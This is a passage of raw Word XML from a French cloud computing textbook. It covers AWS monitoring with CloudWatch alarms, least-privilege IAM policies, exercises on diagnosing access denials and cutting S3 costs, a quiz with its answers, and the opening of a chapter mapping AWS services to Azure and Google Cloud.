      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="140" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>71.5 Supervision</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>CloudWatch collecte métriques et journaux. Une alerte inutile est aussi coûteuse qu'une absence d'alerte : elle apprend à ignorer les notifications.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="LegendeCode"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>Une alerte utile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Alerte sur le taux d'erreur d'une fonction</w:t>
        <w:br/>
        <w:t>aws cloudwatch put-metric-alarm \</w:t>
        <w:br/>
        <w:t xml:space="preserve">  --alarm-name api-erreurs \</w:t>
        <w:br/>
        <w:t xml:space="preserve">  --metric-name Errors --namespace AWS/Lambda \</w:t>
        <w:br/>
        <w:t xml:space="preserve">  --dimensions Name=FunctionName,Value=api \</w:t>
        <w:br/>
        <w:t xml:space="preserve">  --statistic Sum --period 300 --evaluation-periods 2 \</w:t>
        <w:br/>
        <w:t xml:space="preserve">  --threshold 10 --comparison-operator GreaterThanThreshold \</w:t>
        <w:br/>
        <w:t xml:space="preserve">  --alarm-actions arn:aws:sns:eu-west-3:123456789012:alertes</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Legende"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:i/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>Tableau 0.265 — Cinq types d'alerte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09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Type d'alerte</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="228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Bruit</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="363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Utilité</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3094"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="0F2E4C"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Processeur &gt; 80 %</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2287"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Élevé</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3633"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Faible seule</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="309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Taux d'erreur &gt; seuil</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="228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Faible</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="36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Forte</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3094"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="0F2E4C"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Latence p95 &gt; objectif</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2287"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Faible</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3633"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Forte</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="309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Disque plein prévu</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="228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Faible</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="36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Forte</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3094"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="0F2E4C"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Échec de sauvegarde</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2287"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Très faible</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3633"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Critique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CHECK-LIST D'UN COMPTE AWS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Root avec MFA, sans clé d'accès.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Rôles plutôt qu'utilisateurs pour les services.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Étiquettes obligatoires à la création.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Journaux de flux activés sur le VPC.</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Alerte de budget et de facturation.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Sauvegardes testées, pas seulement planifiées.</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IAM accorde les permissions ; le compte root ne sert qu'à l'exceptionnel.</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rôles évitent les clés d'accès permanentes.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VPC sépare public et privé par tables de routage.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groupe de sécurité est un pare-feu avec état, sans refus explicite.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profil d'instance supprime les secrets sur la machine.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S3 stocke des objets ; les classes de stockage changent le coût.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compartiment doit bloquer tout accès public par défaut.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alerte doit signaler un symptôme, pas une ressource.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>AWS est un exemple ; les concepts se retrouvent ailleurs. Le chapitre suivant compare Azure et Google Cloud.</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71.1 — Écrire une politique au moindre privilège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 service doit lire un préfixe S3 et écrire des journaux.</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Limitez les actions.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Limitez les ressources.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Testez avec le simulateur.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Exercice"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="0F2E4C"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Exercice 71.2 — Diagnostiquer un accès refusé</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 xml:space="preserve">Une fonction reçoit </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>AccessDenied</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> sur S3.</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Vérifiez le rôle utilisé.</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Vérifiez la politique.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la politique de compartiment.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Exercice"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="0F2E4C"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Exercice 71.3 — Réduire la facture S3</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="E0A21B"/>
          <w:sz w:val="15"/>
        </w:rPr>
        <w:t xml:space="preserve">   FINOPS</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Le stockage coûte de plus en plus cher.</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Analysez les classes utilisées.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Ajoutez une politique de cycle de vie.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les versions d'objets.</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71.1</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>{</w:t>
        <w:br/>
        <w:t xml:space="preserve">  "Version": "2012-10-17",</w:t>
        <w:br/>
        <w:t xml:space="preserve">  "Statement": [</w:t>
        <w:br/>
        <w:t xml:space="preserve">    {</w:t>
        <w:br/>
        <w:t xml:space="preserve">      "Effect": "Allow",</w:t>
        <w:br/>
        <w:t xml:space="preserve">      "Action": ["s3:GetObject"],</w:t>
        <w:br/>
        <w:t xml:space="preserve">      "Resource": "arn:aws:s3:::mon-site-assets/public/*"</w:t>
        <w:br/>
        <w:t xml:space="preserve">    },</w:t>
        <w:br/>
        <w:t xml:space="preserve">    {</w:t>
        <w:br/>
        <w:t xml:space="preserve">      "Effect": "Allow",</w:t>
        <w:br/>
        <w:t xml:space="preserve">      "Action": ["logs:CreateLogStream", "logs:PutLogEvents"],</w:t>
        <w:br/>
        <w:t xml:space="preserve">      "Resource": "arn:aws:logs:eu-west-3:123456789012:log-group:/app/api:*"</w:t>
        <w:br/>
        <w:t xml:space="preserve">    }</w:t>
        <w:br/>
        <w:t xml:space="preserve">  ]</w:t>
        <w:br/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>La ressource précise évite d'accorder la lecture de tout le compartiment.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Les permissions de journaux sont limitées au groupe concerné, ce qui empêche l'écriture dans les journaux d'audit.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Corrige"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="E0A21B"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Corrigé 71.2</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>aws sts get-caller-identity</w:t>
        <w:br/>
        <w:t>aws iam get-role --role-name api-lambda --query 'Role.AssumeRolePolicyDocument'</w:t>
        <w:br/>
        <w:br/>
        <w:t># Tester la permission effective</w:t>
        <w:br/>
        <w:t>aws iam simulate-principal-policy \</w:t>
        <w:br/>
        <w:t xml:space="preserve">  --policy-source-arn arn:aws:iam::123456789012:role/api-lambda \</w:t>
        <w:br/>
        <w:t xml:space="preserve">  --action-names s3:GetObject \</w:t>
        <w:br/>
        <w:t xml:space="preserve">  --resource-arns arn:aws:s3:::mon-site-assets/public/logo.svg</w:t>
        <w:br/>
        <w:br/>
        <w:t>aws s3api get-bucket-policy --bucket mon-site-assets 2&gt;/dev/null</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Un refus peut venir de la politique d'identité, de la politique de ressource, ou d'une limite de permissions.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Le simulateur indique la décision finale et la politique qui l'a produite.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Corrige"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="E0A21B"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Corrigé 71.3</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>aws s3api list-objects-v2 --bucket mon-site-assets \</w:t>
        <w:br/>
        <w:t xml:space="preserve">  --query "Contents[].{cle:Key,taille:Size,classe:StorageClass}" --output table</w:t>
        <w:br/>
        <w:br/>
        <w:t>aws s3api get-bucket-lifecycle-configuration --bucket mon-site-assets</w:t>
        <w:br/>
        <w:br/>
        <w:t># Les versions anciennes s'accumulent si le versionnement est activé</w:t>
        <w:br/>
        <w:t>aws s3api list-object-versions --bucket mon-site-assets \</w:t>
        <w:br/>
        <w:t xml:space="preserve">  --query "Versions[?IsLatest==</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>false</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>].[Key,VersionId]" --output text | head</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Le versionnement sans expiration conserve indéfiniment les anciennes versions.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Une règle </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>NoncurrentVersionExpiration</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> purge automatiquement ces versions.</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Comment éviter les clés d'accès sur une instance EC2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Les chiffrer sur disque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Utiliser un profil d'instance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Les mettre dans une variable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Utiliser root</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Quel service fournit un réseau isolé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IAM</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VPC</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S3</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CloudWatch</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Un groupe de sécurité peut-il refuser explicitement du trafic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Oui</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Non, il autorise seulement</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Seulement en sortie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Seulement en entrée</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 fait une politique de cycle de vie S3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Chiffre les objets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Change de classe et supprime après un délai</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Bloque l'accès public</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Réplique les objets</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Quel compte doit être protégé par MFA en priorité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 utilisateur applicatif</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 compte root</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Un rôle de service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Un groupe</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Le profil fournit des identifiants temporaires via le service de métadonnées.</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Le VPC délimite le réseau et ses sous-réseaux.</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Il n'existe que des règles d'autorisation ; le reste est refusé.</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Elle automatise le passage entre classes et l'expiration.</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Le compte root ne doit être utilisé qu'en dernier recours.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:pageBreakBefore/>
      </w:pPr>
      <w:r>
        <w:t>72. Azure et Google Cloud : équivalents et choix</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="40" w:after="200" w:line="372" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Transposer les concepts d'un fournisseur à l'autre, sans réapprendre chaque service depuis zéro.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="80" w:line="230" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>Durée de travail : 3 h 00 · Niveau : Intermédiaire · Prérequis : chapitre 71</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Construire une table d'équivalences entre fournisseurs.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Comprendre les modèles d'identité d'Azure et de Google Cloud.</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Choisir un service de calcul équivalent.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Comparer les modèles réseau.</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Évaluer un fournisseur sur des critères objectifs.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="140" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>72.1 Les concepts se ressemblent</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Les trois grands fournisseurs proposent les mêmes briques : identité, réseau virtuel, calcul, stockage, base managée, supervision. Seuls les noms et les détails d'intégration changent.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Legende"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:i/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>Tableau 0.266 — Huit équivalences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283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Besoin</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="180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AWS</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="231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Azure</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="206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Google Cloud</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2833"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="0F2E4C"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Identité et permissions</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1803"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>IAM</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2318"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Entra ID + RBAC</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2060"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Cloud IAM</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>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Réseau virtuel</w:t>
            </w:r>
          </w:p>
        </w:tc>
